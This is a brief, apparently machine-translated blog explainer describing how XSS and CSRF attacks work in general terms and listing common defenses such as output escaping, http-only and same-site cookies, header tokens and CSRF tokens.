XSS and CSRF

XSS

The principle of

XSS cross-site scripting attack, in fact, is in the webpage input box script, script can do some alert or endless loop and login user information (such as verification login token, etc.)

When the user visits the page again, these scripts will be loaded in the page, which will display pop-up alerts, an infinite loop, or send a request to the attacker’s server (the sent request can then carry the user’s local login information and the attacker can use this directly to log in);

The solution

1. Do not trust all input information, the back end can translate the returned result once, especially the special characters such as <, >. If the user information is saved in cookies, you can add http-only same-site

CSRF

The principle of

CSRF cross-site request forgery is actually the login information of the User in the last exit of the attacked website has not expired. When the User visits the website of a.com and visits the website of B.com (a phishing website), there is an interface in B.com to visit the website and use the login information of a.com

The solution

1. Instead of carrying cookies for interface verification, you can add Auth in the header (JWT), or the interface is not allowed to carry cookies 2. Csrf_token 3. Validate referer (but this can be modified)

XSS and CSRF

XSS and CSRF

XSS

The principle of

The solution

CSRF

The principle of

The solution

Related Posts

Transform the Web into a native App using Google TWA (2)

【Vue】 Basic series (4) Style binding – class-style

CSS writes a transparent message box with a border background color